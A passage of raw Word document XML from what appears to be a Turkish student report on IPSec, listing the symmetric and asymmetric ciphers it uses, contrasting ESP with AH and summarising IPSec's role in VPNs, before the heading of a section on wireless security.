        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Triple-pass DES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPSec uygulaması aşağıda örnekleri verilen diğer bilinen şifreleme algoritmalarını da kullanmaktadır. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:keepNext/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BEE4784" wp14:editId="1F3A593D">
            <wp:extent cx="2959257" cy="1995055"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="62" name="Resim 62" descr="IPSec uygulamasÄ± Åifreleme algoritmalarÄ±nÄ± da kullanmaktadÄ±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ec uygulamasÄ± Åifreleme algoritmalarÄ±nÄ± da kullanmaktadÄ±r. ile ilgili gÃ¶rsel sonuc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2165" cy="2010499"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FC39D1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Şekil \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:IpSec te kullanılan Algoritmalar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Asimetrik Şifreler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RSAEl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gamal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DiffieHellman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Simetrik Şifreler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF"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DES (56 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF"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3DES (168 bits in theory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF"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Blowfish ( bits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF"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CAST-12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF"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 xml:space="preserve"> (128 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AES ( bits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Simetrik şifreler hızlı olduklarından Ipsec tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">en fazla </w:t>
      </w:r>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanılanlardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00662C08" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662C08">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7E3B2D" wp14:editId="31B0E1CC">
            <wp:extent cx="5334000" cy="157017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877" t="35914" r="30606" b="36078"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5357905" cy="1577211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Farkı</w:t>
      </w:r>
      <w:r w:rsidRPr="00662C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:AH protokolünden farkı; ESP IP paketinin şifrelenmesini sağlamaktadır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00662C08" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003C2971" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2971">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Özet</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rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Standart olarak, IPSec hızla TCP / IP ağlarında güvenli iletişim için tercih edilen yöntem haline geliyor. Birden fazla şifreleme ve kimlik doğrulama şemasını ve çok satıcılı birlikte çalışabilirliği desteklemek üzere tasarlanan IPSec, hem büyük hem de küçük kuruluşların güvenlik gereksinimlerine uyarlanabilir. İş ortaklarıyla iletişim kurmak için extranet teknolojilerine dayanan endüstriler, IPSec’in esnek şifreleme ve kimlik doğrulama şemalarından faydalanacaktır; büyük işletmeler IPSec’in ölçeklenebilirliğinden ve merkezi yönetiminden faydalanacaktır; ve her şirket, mobil çalışanlara, telekomünikasyon şirketlerine veya şirket kaynaklarına Internet </w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>üzerinden erişen şirket şubelerine destek vermek için IPSec’in sanal özel ağ (VPN) yeteneklerinden faydalanabilir. İnternet Güvenlik Protokolü Mimarisi geleceği düşünülerek tasarlandı ve güvenlik ve bilgisayar topluluklarından hakettiği desteği alıyor. Otomotiv Endüstrisi Eylem Grubu gibi büyük imalatçı dernekleri, Cisco Systems gibi büyük tedarikçilerin ürün taahhütlerinin yanı sıra Uluslararası Bilgisayar Güvenliği Birliği aracılığıyla bir uyumluluk sertifikası programının oluşturulması ile ilgili son onaylar, IPSec'in yolunda olduğunun iyi bir işaretidir. 21. yüzyılda işletmeler arası iletişim için endüstri standardı.</w:t>
      </w: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b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00226167"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t>Adı</w:t>
      </w:r>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>:Halil Durmuş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00226167"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t>Numara:150757017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Bölüm  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>:Bilgisayar Mühendisliği(İ.Ö)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00226167" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bölüm 2.2.13: Kablosuz İnternet Güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
